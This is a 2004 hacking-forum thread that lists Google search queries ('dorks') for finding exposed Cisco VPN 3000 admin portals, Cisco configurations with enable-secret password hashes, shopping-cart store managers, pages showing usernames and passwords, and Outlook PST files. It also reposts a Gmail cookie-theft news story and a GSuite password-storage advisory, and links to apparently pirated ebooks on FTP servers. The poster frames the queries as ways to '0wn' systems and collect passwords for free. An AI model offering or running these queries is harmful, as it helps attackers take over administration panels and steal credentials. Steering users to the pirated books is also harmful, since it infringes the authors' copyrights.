It is reported that a local user with access to the target user's 'documents and settings\user name\Application Data\GSuite\' folder can view the 'settings.xml' file, which contains the target user's password in ASCII value encoded form. The password can be readily decoded.

Impact: A local user can obtain a target user's GMail password.
Solution: No solution was available at the time of this entry. The vendor plans to include a fix in the next release.

==============================================





The Cisco VPN 3000 concentrator is a remote access VPN. This web-based logon portal is for remote management of the Concentrator; by submitting a correct UID and PASS you will '0wn' their concentrator. I. E. is able to delete, copy, and configure whatever your heart desires. You would be in control of all of their VPN's that concentrator has control of.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:Cisco Systems, Inc. VPN 3000 Concentrator

==============================================

This query searches for open root directories of servers running online shopping carts. This shopping cart has an online store 'manager'; in /online-store/StoreManager where you can edit everything from product lists, databases, taxes and passwords.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:Index.Of /" stats merchant online-store cgi-local etc | cgi-bin

==============================================

Sometimes people make mistakes and post their Cisco configurations on "help sites" and don't edit info. So we might be able to find the enable passwords.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intext:"enable secret 5 $"


Or, for more specifications

intext:"enable secret 5 $" "Current configuration:"

==============================================

This query searches for the following in the servers:
Network Statistics
General Info
Total disk space/memory
Php environment!!!
Current network connections!!!
Running services...

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"sysinfo * " intext:"Generated by Sysinfo *

==============================================

Imagine that when you enter any web site, and you are surprised that when searching for any program in it you can not find it. By this fabulous trick, you can find the link for downloading any program in this site through any search engine.

For example, suppose you want to search for the program "norton" in the web site Only the registered members can see the link ; when you go to Only the registered members can see the link and write the following code, you will be surprised that the "google" search engine searches only in the site Only the registered members can see the link To do this:

Write in the address bar of the web browser this address: Only the registered members can see the link
When opening the web site; write in the search engine this code: "norton site:Only the registered members can see the link", and press the button search or "أبحث".
As mentioned earlier: the code is easy, just write in the place of the word "norton"; any word you need to search for in the site followed in the code.

The code again is ....

norton site:Only the registered members can see the link

By the way, you can practise this code at any seach engine.

-------------------------------------------------------------------------------------

Another trick is that you can force the search engine of the "google" web site to search for a certain category like "Linux" topics. when you add any category after the google link and write any thing in the search engine, you will surprised that the site searched for linux only. For example, if you wrote the following code:


Only the registered members can see the link


As we mentioned in the code earlier, the site followed by the word "linux". So the web site is forced for searching for the linux topics only all over the internet.
_________________
Best Regards,
Mahmoud Hany,
Country: Egypt,
Title: IT instructor,
Mobile: 0106354485

View user's profile Send private message
blackwood
Kiddie
Kiddie


Joined: 21 Sep 2004
Posts: 22
Location: Egypt

PostPosted: Thu Nov 18, 2004 1:14 pm Post subject: Continue........... Reply with quoteBack to top
Imagine that you can connect to another computer remotely through the internet from the feature called "Remote Desktop Web Connection".
To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"Remote Desktop Web Connection"

==============================================

Through this query you can find every web page "Google" has crawled for a specific site.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Site: Microsoft.com

==============================================
Through this query, you can see web servers with default pages can serve as juicy targets.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Intitle:test.page.for.apache "it worked"

==============================================

No one can deny that the directory listings can be a source of great information.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Intitle:index.of/admin

==============================================

We will use this query to locate additional servers, subtract common hostnames from the query.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Site: Microsoft.com - Site:Only the registered members can see the link

==============================================

From this query you can get huge user names and passwords from huge sites for free.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"Welcome to *" "Your password is *"

==============================================

From this query you can collect many numbers of ".PST" files, which contain all E-mail folders, addresses or anything else that Outlook 97, 2000, xp or 2003 collects.

To see results; just write in the (Only the registered members can see the link) search engine the code:

outlook filetype:pst

==============================================

allinurl:gmail.google.com

"NetLife" Exclusive: Security hole found in "Gmail"
An Israeli hacker reveals: A security hole in "Gmail" allows the compromise of users' email boxes – without the need of a password Nitzan Weidenfeld, Nana NetLife Magazine.

So you’ve got a "Gmail" mail account? Or maybe you’ve just received an invitation? Well, we have some bad news for you: Your mail box is exposed. A major security hole in Google's mail service, allows full access to user accounts, without the need of a password.

"Everything could get publicly exposed – your received mails might be readable, as well as all of your sent mail, and furthermore – anyone could send and receive mail under your name", thus reveals Nir Goldshlagger, an Israeli hacker, on an exclusive interview with "Nana NetLife" Magazine. "Even more alarming", he explains, "is the fact that the hack itself is quite simple. All that is needed of the malicious hacker, beside knowledge of the specific technique, is quite basic computer knowledge, the victim's username – and that’s it, he's inside".

When approached, Google admitted to the security flaw. Google also assured us that this matter is being resolved, and that "the company will go to any length to protect its users".

The flaw which was discovered by Goldshlagger and was tested many times by Nana's editorial board had shown an alarming success rate. In order not to further jeopardize mail boxes' owners, we will only disclose that the process is based upon a security breach in the service's identity authentication. It allows the hacker to "snatch" the victims cookie file (a file planted in the victim's computer used to identify him) using a seemingly innocent link (which directs to Gmail's site itself). Once stolen, this cookie file allows the hacker to identify himself as the victim, without the need of a password. Even if the victim does change his password afterwards, it will be to no avail. "The system authenticates the hacker as the victim, using the stolen cookie file. Thus no password is involved in the authentication process. The victim can change his password as many times as he pleases, and it still won't stop the hacker from using his box", explains Goldshlagger.

Whether hackers have already used this method to compromise users' accounts is unclear at the moment.

Matters are several times worse when it comes to a service such as "Gmail". Besides the obvious blow to Google's seemingly spotless image, we're looking here at a major threat to anyone who has turned to "Gmail" as his major email box. "Because "Gmail" offers a gigabyte of storage, several times bigger than most other web based mail services, users hardly delete any old correspondence", says Goldshlagger. "The result is a huge amount of mail accumulating in the users' boxes, which frequently include bank notices, passwords, private documents and other files the user wanted to backup. Who ever takes a hold of this data, could literally take over the victim's life and identity".

"Ofer Elzam", a security expert for "Aladdin", who examined the security hole at "Nana's Netlife" request, explains: "This is a major threat, for the following reasons: First – the users have no way of protecting themselves. Second – it's quite easy to carry out, and third – it allows identity theft, which is nothing less than a serious danger to the victim".

"On the bright side", he adds, "its a good thing that this hole was found now, before the service was officially announced and offered to millions of users world-wide. I reckon it's just a matter of time before an automatic tool is made, which would allow even the less computer-savvy people to exploit this hack. The damage, needless to say, could be huge"

Is there a way, after all, to protect ourselves in the face of this danger? Elzam does not bear good news on the matter. "The only immediate solution that comes to mind is not using "Gmail" to store any messages or files that might be maliciously used. At least until Google attends to this problem".

I received a weird email last week and I forwarded it to the bug report. Guess that was the cookie link I talked about. I put it here:







From: accounts-noreply@google.com <accounts-noreply@google.com>
To: xxxx@xxxx
Date: Tue, 26 Oct 2004 08:22:16 -0700 (PDT)
Subject: Google Password Assistance
Reply | Reply to all | Forward | Print | Add sender to contacts list | Trash this message | Show original

To initiate the process for resetting the password for your
xxxxx@gmail.com Google Account, visit the link below

Only the registered members can see the link

Thank you for using Google.

For questions or concerns regarding your account, please send mail to
accounts-support@google.com.

This is a post-only mailing. Replies to this message are not monitored
or answered.


And this is the explanation to what mentioned earlier:

Last Monday reported that a vulnerability in "GSuite". A local user can obtain the target user's "GMail" password.

It is reported that a local user with access to the target user's 'documents and settings\user name\Application Data\GSuite\' folder can view the 'settings.xml' file, which contains the target user's password in ASCII value encoded form. The password can be readily decoded.

Impact: A local user can obtain a target user's GMail password.
Solution: No solution was available at the time of this entry. The vendor plans to include a fix in the next release.

==============================================





The Cisco VPN 3000 concentrator is a remote access VPN. This web-based logon portal is for remote management of the Concentrator; by submitting a correct UID and PASS you will '0wn' their concentrator. I. E. is able to delete, copy, and configure whatever your heart desires. You would be in control of all of their VPN's that concentrator has control of.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:Cisco Systems, Inc. VPN 3000 Concentrator

==============================================

This query searches for open root directories of servers running online shopping carts. This shopping cart has an online store 'manager'; in /online-store/StoreManager where you can edit everything from product lists, databases, taxes and passwords.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:Index.Of /" stats merchant online-store cgi-local etc | cgi-bin

==============================================

Sometimes people make mistakes and post their Cisco configurations on "help sites" and don't edit info. So we might be able to find the enable passwords.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intext:"enable secret 5 $"


Or, for more specifications

intext:"enable secret 5 $" "Current configuration:"

==============================================

This query searches for the following in the servers:
Network Statistics
General Info
Total disk space/memory
Php environment!!!
Current network connections!!!
Running services...

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"sysinfo * " intext:"Generated by Sysinfo *

==============================================
_________________
Best Regards,
Mahmoud Hany,
Country: Egypt,
Title: IT instructor,
Mobile: 0106354485

View user's profile Send private message
blackwood
Kiddie
Kiddie


Joined: 21 Sep 2004
Posts: 22
Location: Egypt

PostPosted: Thu Nov 18, 2004 1:20 pm Post subject: Continue........... Reply with quoteBack to top
Only the registered members can see the link [Searching for books on FTP and HTTP servers]

intitle:index.of? pdf cisco [The Google Code]
================================================== =================================================
Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link
================================================== =================================================
Only the registered members can see the link

You'll FIND ALL THE FOLLOWING EBOOKS IN THE ABOVE SITE:

0130084565 Mobile Location Services: The Definitive Guide
0130091154 The Linux Development Platform
0130094021 C++: A Dialog: Programming with the C++ Standard Library
0130122475 Informix Handbook
0130211192 XML Processing with Python (with CD-ROM)
0130220280 Practical Programming in Tcl and Tk (3rd Edition)
0130260363 Core Python Programming
0130281875 Real World Linux Security: Intrusion Prevention, Detection and Recovery
0130320722 Just Java 2 (5th Edition)
0130324108 Learning to Program in C++ (CD-ROM)
0130354732 Embedded Software Development with eCos
0130385603 Practical Programming in Tcl and Tk (4th Edition)
0130404462 XSLT and XPATH: A Guide to XML Transformations
0130412066 TrellixWeb Web Site Creation Kit
0130449113 Verilog HDL (2nd Edition)
0130463612 DB2 Universal Database V8 for Linux, UNIX, and Windows Database Administration Certification Guide (5th Edition)
0130463868 BEA WebLogic Server Administration Kit
0130463884 Advanced DBA Certification Guide and Reference for DB2 UDB v8 for Linux, Unix and Windows
0130463914 DB2 Universal Database v8 Application Development Certification Guide, Second Edition
0130464163 Halting the Hacker: A Practical Guide to Computer Security (With CD-ROM)
0130464562 Real World Linux Security (2nd Edition)
0130470651 Analog Electronics with LabVIEW (With CD-ROM)
0130474150 Image Processing with LabVIEW and IMAQ Vision
0130476765 J2EE and JAX: Developing Web Applications and Web Services
0130600814 HP-UX 11i System Administration Handbook and Toolkit
0130618861 LabVIEW for Electric Circuits, Machines, Drives, and Laboratories
0130621544 JumpStart Technology: Effective Use in the Solaris Operating Environment (With CD-ROM)
0130623385 Web Services: A Java Developer's Guide Using e-Speak (With CD-ROM)
0130650765 DB2 Universal Database for OS/390 Version 7.1 Certification Guide
0130654140 Planning Smarter: Creating Blueprint Quality Software Specifications with CDROM
013066538X UNIX Shells by Example (3rd Edition)
0130674494 Integrated Project Management
0130796662 Graphic Java 2, Volume 1: AWT (3rd Edition)
0130796670 Graphic Java 2, Volume 2: Swing (3rd Edition)
0130832928 Core Swing: Advanced Programming
0130844667 Advanced Java Networking (2nd Edition)
0130869856 Windows Graphics Programming: Win32 GDI and DirectDraw (With CD-ROM)
0130882488 Core JSP
0130894680 Core Java 2, Volume 1: Fundamentals (5th Edition)
0130907634 SOAP: Cross Platform Web Services Development Using XML
0130911119 J2EE Applications and BEA WebLogic Server
0130927384 Core Java 2, Volume II: Advanced Features (5th Edition)
0131002872 Thinking in Java (3rd Edition)
0131003135 Applications Interface Programming Using Multiple Languages: A Windows Programmer's Guide
0131007718 DB2 Universal Database for OS/390 v7.1 Application Certification Guide
0131007726 DB2 SQL Procedural Language for Linux, Unix and Windows
0131018833 HP-UX 11i Systems Administration Handbook and Toolkit, Second Edition
0131401580 DB2 Version 8: The Official Guide
0131401629 JavaScript by Example
0131407457 OpenOffice.Org 1.0 Resource Kit
0131493868 PANIC! UNIX System Crash Dump Analysis Handbook (Bk/CD-ROM)
0137669658 Core Java 1.1 Volume II Advanced Features
0201309726 Programming for the Java™ Virtual Machine
0201485397 Java Design Patterns: A Tutorial
0201485583 The Java Tutorial Continued: The Rest of the JDK
0201615762 The Guru's Guide to Transact-SQL
0201657589 LDAP Programming with Java™
0201675234 The Korn Shell: Linux and Unix Shell Programming Manual (3rd Edition)
0201699567 Real-Time Design Patterns: Robust Scalable Architecture for Real-Time Systems
0201700468 The Guru's Guide to SQL Server Stored Procedures, XML, and HTML (With CD-ROM)
0201700476 The Guru's Guide to SQL Server Architecture and Internals
0201702622 Director 8 and Lingo Authorized (3rd Edition)
0201702657 Visual Basic Design Patterns VB 6.0 and VB.NET (With CD-ROm)
0201702843 Adobe® Acrobat® 4.0 Classroom in a Book (2nd Edition)
0201703092 The Practical SQL Handbook: Using SQL Variants (4th Edition)
0201703661 SAP BW: A Step by Step Guide for BW 2.0
0201703939 The Java™ Tutorial: A Short Course on the Basics (3rd Edition)
0201704218 JavaServer Pages
0201709201 Director 8 Demystified
0201710153 Adobe® Illustrator® 9.0 Classroom in a Book
0201710161 Adobe Photoshop 6.0 Classroom in a Book
020171017X Adobe® GoLive® 5.0 Classroom in a Book
0201710188 Adobe Premiere 6.0: Classroom in a Book
0201710412 The Java 3D™ API Specification (2nd Edition)
0201716127 Adobe® Photoshop® 6.0 Studio Techniques
0201719568 Hack I.T.: Security Through Penetration Testing
0201719622 Building Parsers With Java
020172796X Photoshop 6 ImageReady 3 Hands-On Training (With CD-ROM)
0201728281 A Programmer's Guide to Java Certification: A Comprehesive Primer, Second Edition
0201729318 Macromedia Flash 5: Training from the Source
0201729377 Adobe® Acrobat® 5.0 Classroom in a Book
0201729563 Building Scalable and High-Performance Java Web Applications Using J2EE Technology
020172989X Adobe® Photoshop® 6.0 and Illustrator® 9.0 Advanced Classroom in a Book
0201731355 Macromedia Dreamweaver 4: Training from the Source
0201731363 Maxon Cinema 4D 7
0201734028 Create Dynamic Web Pages Using PHP and MySQL
0201741318 Adobe After Effects 5.0: Classroom in a Book
0201741334 Dreamweaver 4 Hands-On Training
0201741644 Macromedia Director 8.5 Shockwave Studio for 3D: Training from the Source
0201750430 After Effects 5 for Macintosh and Windows: Visual QuickPro Guide
0201750775 Guerrilla Oracle: The Succinct Windows Perspective
0201752832 Microsoft SQL Server 2000: A Guide to Enhancements and New Features
0201752840 Database Design for Mere Mortals: A Hands-On Guide to Relational Database Design, Second Edition
0201752948 Oracle SQL and PL/SQL Handbook: A Guide for Data Administrators, Developers, and Business Analysts
020175469X After Effects 5.0/5.5 Hands-On Training
0201756242 Adobe Illustrator 10 Classroom in a Book
0201756250 Adobe PageMaker 7.0 Classroom in a Book
0201758210 Process Quality Assurance for UML-Based Projects
0201758466 Macromedia Flash MX Advanced for Windows and Macintosh Visual QuickPro Guide
0201768119 The Java Web Services Tutorial
0201770040 XML and Java: Developing Web Applications, Second Edition
0201770210 Macromedia Flash MX Game Design Demystified
0201770229 Macromedia Flash MX ActionScripting: Advanced Training from the Source
0201774259 Real World XML Web Services: For VB and VB .NET Developers
0201784203 Business Intelligence Roadmap: The Complete Project Lifecycle for Decision-Support Applications
0201787199 Adobe GoLive 6.0 Classroom in a Book (With CD-ROM)
0201787202 Adobe InDesign 2.0 Classroom in a Book
0201791684 The J2EE Tutorial
0201794829 Macromedia Flash MX: Training from the Source
0201795361 Macromedia MX eLearning: Advanced Training from the Source
0201799286 Macromedia Fireworks MX: Training from the Source
0201799294 Macromedia Dreamweaver MX: Training from the Source
0201799405 Code Reading: The Open Source Perspective
0201844532 C# Design Patterns: A Tutorial
0321108949 Applied C++: Techniques for Building Better Software
0321108957 Honeypots: Tracking Hackers
0321112555 Real Web Project Management: Case Studies and Best Practices from the Trenches
0321112768 Photoshop 7/ImageReady for the Web Hands-On Training
0321115627 Adobe Photoshop 7.0 Classroom in a Book
032111583X Final Cut Pro 3 for Macintosh (Visual QuickPro Guide)
0321123808 Java Data Objects
0321125169 ColdFusion MX Web Application Construction Kit, Fifth Edition
0321133455 Troubleshooting Microsoft Technologies: The Administrator's Repair Manual
0321150791 JavaServer Pages, Second Edition
0321154991 XForms: XML Powered Web Forms
0321158857 Adobe Premiere 6.5 Classroom in a Book
0321159985 Moving to Linux: Kiss the Blue Screen of Death Goodbye!
0321166809 Macromedia Dreamweaver MX Dynamic Applications: Advanced Training from the Source
0321168828 .NET-A Complete Development Cycle
0321180992 Mac OS X Hands-On Training
0672309998 Alison Balter's Mastering Access 97 Development, Premier Edition, Second Edition (2nd Edition)
0672312417 Visual C++ 6 Unleashed
0672315068 F. Scott Barker's Microsoft Access 2000 Power Programming
0672315149 XML Unleashed
0672315335 Sams Teach Yourself Visual Basic 6 in 24 Hours
0672316250 Sams Teach Yourself RoboHELP 2000 for HTML Help in 24 Hours (Teach Yourself -- Hours)
0672317427 Microsoft Windows 2000 Professional Unleashed (Unleashed)
0672317842 PHP and MySQL Web Development
0672317958 Building Java Enterprise Systems with J2EE
067231813X Professional Development with Visio 2000 (Other Sams)
0672318873 Com+ Unleashed (Unleashed)
0672318989 Sams Teach Yourself E-Commerce Programming with ASP in 21 Days (Teach Yourself -- 21 Days)
0672319012 Sams Teach Yourself Dreamweaver UltraDev 4 in 21 Days
067231973X Scot Hillier's COM+ Programming with Visual Basic
0672319853 Red Hat Linux 7 Unleashed
0672319977 Microsoft SQL Server 2000 Unleashed
0672320541 Applied XML Solutions (Sams Professional Publishing)
0672320606 Kylix Developers Guide (With CD-ROM)
0672320754 Sams Teach Yourself to Create Web Pages in 24 Hours (3rd Edition)
0672321157 Delphi 6 Developer's Guide (With CD-ROM)
0672321335 Zope Web Application Construction Kit
0672321777 Building Dynamic WAP Applications with MobileDev
0672322064 FreeBSD Unleashed (With CD-ROM)
0672322110 Enhydra XMLC Java Presentation Development
0672322242 Sams Teach Yourself C++ in 24 Hours, Complete Starter Kit (3rd Edition)
067232332X Peer-to-Peer Programming on Groove®
0672323478 JBoss Administration and Development
0672323699 Tricks of the Windows Game Programming Gurus (2nd Edition)
0672323842 Sams Teach Yourself J2EE in 21 Days (With CD-ROM)
0672324172 BEA WebLogic Workshop Kick Start
0672324245 Sams Teach Yourself FreeBSD in 24 Hours
067232427X Borland JBuilder Developer's Guide
0672324334 Sams Teach Yourself BEA WebLogic Server 7.0 in 21 Days
0672324598 Maximum Security, Fourth Edition
067232461X Sams Teach Yourself Game Programming in 24 Hours
0672324679 Microsoft SQL Server 2000 Unleashed (2nd Edition)
0672324725 Struts Kick Start
0672324806 Borland C++Builder 6 Developer's Guide
0672324873 BEA WebLogic Server 8.1 Unleashed
0672324881 Maximum Wireless Security
067232489X Sams Teach Yourself PHP, MySQL and Apache in 24 Hours
067232525X PHP and MySQL Web Development, Second Edition
067232542X ASP.NET Unleashed, Second Edition
0672325829 Sams Teach Yourself DB2 Universal Database in 21 Days, Second Edition
0672325896 C#Builder Kick Start
0672325969 Managed DirectX 9 Kick Start
0672325977 Sams Teach Yourself JavaServer Pages 2.0 in 24 Hours, Complete Starter Kit with Apache Tomcat
0735709475 Inside AutoCAD® 2000, Limited Edition
0735709718 Cisco CCNA Exam #640-507 Certification Guide (With CD-ROM)
0735709955 Cisco CCNP Support Exam Certification Guide (With CD-ROM)
0735709971 Web Application Development with PHP 4.0 (with CD-ROM)
073571052X C++ XML
0735710619 Windows 2000 Power Toolkit
0735710929 MCSE Training Guide (70-227): Installing, Configuring, and Administering Microsoft Internet Security and Acceleration (ISA) Server 2000
0735710945 Inside 3ds max 4
0735711054 Inside Flash (With CD-ROM)
0735711291 MCAD/MCSD/MCSE Training Guide (70-229): SQL Server 2000 Database Design and Implementation
0735711348 Inside LightWave 7 (With CD-ROM)
0735711488 Inside AutoCAD 2002
073571150X Building Accessible Websites (With CD-ROM)
0735711577 MCSE Training Guide (70-244): Supporting and Maintaining a Windows NT Server 4 Network
073571181X Inside Dreamweaver MX
073571195X Java for the Web with Servlets, JSP, and EJB: A Developer's Guide to J2EE Solutions
0735712352 Cocoon: Building XML Applications
0735712530 Inside Maya 5
0735712832 The Flash MX Project
0735713278 Maya 4.5 Fundamentals
0789713993 "Special Edition Using Microsoft Excel 97, Best Seller Edition" (2nd Edition)
0789715538 Using Microsoft Windows 95 With Internet Explorer 4.0 (Special Edition Using...)
0789716062 Special Edition Using Microsoft Access 2000
0789718146 Special Edition Using Lotus Notes and Domino R5
0789719045 Special Edition Using Microsoft PowerPoint 2000
0789722534 Using Microsoft Project 2000 (Special Edition)
0789722674 Special Edition Using HTML 4 (6th Edition)
0789724448 Special Edition Using Macromedia Flash 5 (with CD-ROM)
0789724472 Microsoft SQL Server 2000 Database Development From Scratch
078972510X Special Edition Using Microsoft Access 2002
0789725428 Upgrading and Repairing PCs (13th Edition)
0789725576 Upgrading and Repairing Networks (3rd Edition)
0789725673 Special Edition Using Enterprise JavaBeans (EJB) 2.0
0789726270 Special Edition Using Microsoft® Windows XP, Home Edition
0789726289 Special Edition Using Windows XP Professional
078972667X Special Edition Using Macromedia Director 8.5 (With CD-ROM)
0789726769 C++ by Example
0789727277 Special Edition Using Adobe GoLive 6
0789727609 Special Edition Using Adobe Photoshop 7
0789727625 Special Edition Using Macromedia Flash MX
0789727633 Special Edition Using Microsoft Commerce Server 2002
0789727730 MCSE Training Guide (70 270): Windows XP Professional (With CD-ROM)
0789727900 Platinum Edition Using Microsoft Windows XP
0789728001 Upgrading and Repairing Laptop Computers
078972801X CISSP Training Guide
0789728192 MCAD/MCSD Training Guide (70-306): Developing and Implementing Windows-Based Applications with Visual Basic.NET and Visual Studio.NET
0789728206 MCAD/MCSD Training Guide (70-310): Developing XML Web Services and Server Components with Visual Basic .NET and the .NET Framework
0789728214 Sun Certification Training Guide (310-080): Java 2 Enterprise Edition (J2EE) Web Component Developer
0789728249 MCAD/MCSD Training Guide (70-320): Developing XML Web Services and Server Components with Visual C# .NET and the .NET Framework
0789728303 Network+ Training Guide
0789728362 Security+ Training Guide
0789728613 Java 2 Programmer Exam Cram (310-035)
0789728621 Java 2 Enterprise Edition (J2EE) Web Component Developer Exam Cram 2 (Exam Cram 310-080)
078972863X MCSE Windows 2000 Network Infrastructure Exam Cram 2 (Exam Cram 70-216)
0789728648 MCSE Windows 2000 Active Directory Services Design Exam Cram 2 (Exam Cram 70-219)
0789728656 Network+ Exam Cram 2 (Exam Cram N10-002)
0789728664 MCSA Managing a Windows 2000 Network Environment Exam Cram 2 (Exam Cram 70-218)
0789728672 A+ Exam Cram 2 (Exam Cram 220-221, Exam Cram 220-222)
0789728680 Solaris 8 System Administrator Exam Cram 2 (Exam CX-310-011 and CX-310-012)
0789728699 Solaris 9 System Administrator Exam Cram 2 (Exam Cram 310-014, Exam Cram 310-015)
0789728702 Solaris 9 Network Administration Exam Cram 2 (Exam Cram CX-310-044)
0789728710 MCSE Windows 2000 Active Directory Services Infrastructure Exam Cram 2 (Exam 70-217)
0789728729 MCSE Windows 2000 Professional Exam Cram 2 (Exam Cram 70-210)
0789728737 MCSE Windows 2000 Server Exam Cram 2 (Exam Cram 70-215)
0789728745 MCSE Windows XP Professional Exam Cram 2 (Exam Cram 70-270)
0789728788 MCSE/MCSA Training Guide (70-216): Windows 2000 Network Infrastructure, Second Edition
0789728818 MCSE/MCSA Training Guide, Second Edition (70-215): Windows 2000 Server
0789728826 Special Edition Using Microsoft CRM
0789728974 MCAD Developing XML Web Services and Server Components with Visual C# .NET and the .NET Framework Exam Cram 2 (Exam Cram 70-320)
0789728982 MCAD Developing and Implementing Web Applications with Microsoft Visual Basic .NET and Microsoft Visual Studio .NET Exam Cram 2 (Exam Cram 70-305)
0789728990 MCAD Developing and Implementing Windows-based Applications with Microsoft Visual Basic .NET and Microsoft Visual Studio .NET Exam Cram 2 (Exam Cram 70-306)
0789729008 MCAD Developing XML Web Services and Server Components with Visual Basic .NET and the .NET Framework Exam Cram 2 (Exam Cram 70-310)
0789729016 MCAD Developing and Implementing Web Applications with Microsoft Visual C# .NET and Microsoft Visual Studio .NET Exam Cram 2 (Exam Cram 70-315)
0789729105 Security+ Exam Cram 2 (Exam Cram SYO-101)
0789729466 MCSA/MCSE Managing and Maintaining a Windows Server 2003 Environment Exam Cram 2 (Exam Cram 70-290)
0789729482 MCSA/MCSE 70-291 Training Guide: Implementing, Managing, and Maintaining a Windows Server 2003 Network Infrastructure
0789729504 MCSE Planning, Implementing, and Maintaining a Microsoft Windows Server 2003 Active Directory Infrastructure Exam Cram 2 (Exam Cram 70-294)
0789729512 MCSA/MCSE Implementing and Administering Security in a Windows 2000 Network Exam Cram 2 (Exam Cram 70-214)
0789729520 Special Edition Using Microsoft Office Access 2003
0789729539 Special Edition Using Microsoft Office Excel 2003
0789729547 Special Edition Using Office Microsoft FrontPage 2003
0789729555 Special Edition Using Microsoft Office 2003
0789729563 Special Edition Using Microsoft Office Outlook 2003
078972958X Special Edition Using Microsoft Word 11
0789729725 Easy CDs & DVDs
0789729741 Upgrading and Repairing PCs, 15th Edition
0789729792 Novell's CNE Update to NetWare 6 Study Guide
0789729911 CCNP BCMSN Exam Cram 2 (642-811), Second Edition
078972992X Java 2 Developer Exam Cram 2 (Exam Cram CX-310-252A and CX-310-027)
0789729970 MCDBA, MCSE, MCSD, MCAD Training Guide (70-229): SQL Server 2000 Database Design and Implementation
0789730111 MCSA/MCSE Managing and Maintaining a Windows Server 2003 Environment Exam Cram 2 (Exam Cram 70-292)
078973012X MCSE Planning and Maintaining a Windows Server 2003 Network Infrastructure Exam Cram 2 (Exam Cram 70-293)
0789730170 Cisco BSCI Exam Cram 2 (Exam Cram 642-801)
0789730200 CCNP BCRAN Exam Cram 2
0789730219 CCNP CIT Exam Cram 2 (642-831)
0789730235 CCSP CSPFA Exam Cram 2 (Exam Cram 642-521)
0789730243 CCSP CSI Exam Cram 2 (9E0-131)
0789730251 CCSP SECUR Exam Cram 2 (642-501)
078973026X CCSP CSVPN Exam Cram 2 (Exam Cram 642-511)
0789730367 Easy Microsoft Windows XP Home Edition, Second Edition
0789730375 PMP Exam Cram 2
156830370X Adobe® PageMaker® 6.5 Classroom in a Book
1568304676 Adobe Premiere 5.0 Classroom in a Book
157870085X Solaris 2.6 Administrator Certification Training Guide, Part 1
1578702496 Solaris 7 Administrator Certification Training Guide: Part I and Part II
1578702615 Solaris 8 Network Administrator Training Guide (With CD-ROM)
1587050609 Developing Cisco IP Phone Services: A Cisco AVVID Solution
1587130173 High Availability Network Fundamentals (With CD-ROM)
1587200333 Cisco CID Exam Certification Guide
1587200538 CCIE Routing and Switching Exam Certification Guide
1587200554 Cisco CCNA Exam #640-607 Certification Guide (3rd Edition)
1587200767 CCDA Exam Certification Guide (CCDA Self-Study, 640-861), Second Edition
1587200775 CCNP BCMSN Exam Certification Guide (CCNP Self-Study, 642-811), Second Edition
1587200783 CCNP BSCI Exam Certification Guide (CCNP Self-Study), Second Edition
158720083X CCNA ICND Exam Certification Guide (CCNA Self-Study, 640-811, 640-801), Fourth Edition
0735711291 MCAD/MCSD/MCSE Training Guide (70-229): SQL Server 2000 Database Design and Implementation
0735711534 Fireworks MX Fundamentals
================================================== =================================================
ftp://ftp.netz.ru/Books/

ftp://130.133.1.100/doc/

ftp://ftp2.trainingtools.com/

ftp://195.161.102.62/pub/books/

ftp://213.131.9.205/ftp/Polosko/

ftp://202.96.64.158/pub/

ftp://195.135.232.80/Books/
================================================== =================================================
Only the registered members can see the link [MCSE exams]
================================================== =================================================
Only the registered members can see the link

Only the registered members can see the link
================================================== =================================================
Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link
================================================== =================================================
Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link(2004) %20[0596006225].chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link %20C++.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link .chm

Only the registered members can see the link

Only the registered members can see the link(CHM).chm

Only the registered members can see the link

Only the registered members can see the link(2nd%20Edition%20-%202002).chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link rity.chm

Only the registered members can see the link(2003)%20LiB.chm

Only the registered members can see the link or%20Windows.chm

Only the registered members can see the link

Only the registered members can see the link(0-56592-449-5).chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link e.2nd.Edition.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link hm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link ition.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link ok.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link m

Only the registered members can see the link

Only the registered members can see the link es.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link n.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link eBook-FOS.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link Edition.chm

Only the registered members can see the link d.Edition.chm

Only the registered members can see the link e.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

